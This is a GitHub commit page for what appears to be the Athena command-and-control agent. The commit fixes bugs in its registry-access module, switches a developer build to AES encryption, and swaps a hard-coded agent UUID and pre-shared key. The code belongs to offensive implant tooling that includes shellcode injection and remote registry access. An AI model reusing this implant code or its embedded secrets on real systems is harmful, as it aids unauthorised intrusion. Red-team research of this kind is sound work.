Skip to content

Commit

Permalink
fixed reg issue
Browse files Browse the repository at this point in the history
  • Loading branch information
@checkymander
checkymander committed Jan 31, 2024
1 parent 4e5c3f3 commit 39b845d
Show file tree
Hide file tree
Showing 3 changed files with 13 additions and 13 deletions.
2 changes: 1 addition & 1 deletion Payload_Type/athena/athena/agent_code/Agent/Agent.csproj
View file
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@

<ItemGroup Condition="'$(COMPUTERNAME)' == 'DESKTOP-GRJNOH2' Or '$(COMPUTERNAME)' == 'DEV3' Or '$(COMPUTERNAME)' == 'DEV1'">
<ProjectReference Include="..\Agent.Profiles.Http\Agent.Profiles.Http.csproj" />
<ProjectReference Include="..\Agent.Crypto.None\Agent.Crypto.None.csproj" />
<ProjectReference Include="..\Agent.Crypto.Aes\Agent.Crypto.Aes.csproj" />
<ProjectReference Include="..\Agent.Managers.Windows\Agent.Managers.Windows.csproj" />
<ProjectReference Include="..\inject-shellcode\inject-shellcode.csproj" />
<ProjectReference Include="..\arp\arp.csproj" />
Expand Down
4 changes: 2 additions & 2 deletions Payload_Type/athena/athena/agent_code/Agent/Config/AgentConfig.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -52,8 +52,8 @@ public AgentConfig()
#if CHECKYMANDERDEV
sleep = 1;
jitter = 1;
uuid = "2964e461-08bd-478b-9797-97a65d42c4d2";
psk = "Zdd1AiEGNo1mpBKb/jpeZyHWam+eIFLlL5uodtuvTOk=";
uuid = "1983c222-a0d0-44be-a785-d8263727e437";
psk = "cVe+0wszHsfwqlLxBhxYFoOr99m+rmLgTTqO/1Wbo+c=";
killDate = DateTime.Now.AddYears(1);
#else
uuid = "%UUID%";
Expand Down
20 changes: 10 additions & 10 deletions Payload_Type/athena/athena/agent_code/reg/reg.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -48,6 +48,7 @@ public async Task Execute(ServerJob job)
{
rr.status = "error";
}
rr.user_output = response;
break;
case "add":
bool err = false;
Expand Down Expand Up @@ -181,7 +182,7 @@ private string NormalizeKey(string text)

if (dic.ContainsKey(hive))
{
text.Replace(hive, dic[hive]);
text = text.Replace(hive, dic[hive]);
}

return text;
Expand All @@ -191,29 +192,28 @@ private bool TryGetRegistryKey(string hostname, string keyPath, out RegistryKey
string[] regParts = keyPath.Split('\\');
string hive = regParts[0];
string path = string.Join('\\', regParts, 1, regParts.Length - 1);

try
{
switch (hive)
{
case "HKCU":
rk = string.IsNullOrEmpty(hostname) ? Registry.CurrentUser.CreateSubKey(path) :
RegistryKey.OpenRemoteBaseKey(RegistryHive.CurrentUser, hostname).CreateSubKey(path);
rk = string.IsNullOrEmpty(hostname) ? Registry.CurrentUser.OpenSubKey(path) :
RegistryKey.OpenRemoteBaseKey(RegistryHive.CurrentUser, hostname).OpenSubKey(path);
err = "";
return true;
case "HKU":
rk = string.IsNullOrEmpty(hostname) ? Registry.Users.CreateSubKey(path) :
RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, hostname).CreateSubKey(path);
rk = string.IsNullOrEmpty(hostname) ? Registry.Users.OpenSubKey(path) :
RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, hostname).OpenSubKey(path);
err = "";
return true;
case "HKCC":
rk = string.IsNullOrEmpty(hostname) ? Registry.CurrentConfig.CreateSubKey(path) :
RegistryKey.OpenRemoteBaseKey(RegistryHive.CurrentConfig, hostname).CreateSubKey(path);
rk = string.IsNullOrEmpty(hostname) ? Registry.CurrentConfig.OpenSubKey(path) :
RegistryKey.OpenRemoteBaseKey(RegistryHive.CurrentConfig, hostname).OpenSubKey(path);
err = "";
return true;
case "HKLM":
rk = string.IsNullOrEmpty(hostname) ? Registry.LocalMachine.CreateSubKey(path) :
RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, hostname).CreateSubKey(path);
rk = string.IsNullOrEmpty(hostname) ? Registry.LocalMachine.OpenSubKey(path) :
RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, hostname).OpenSubKey(path);
err = "";
return true;
default:
Expand Down

0 comments on commit 39b845d

Please sign in to comment.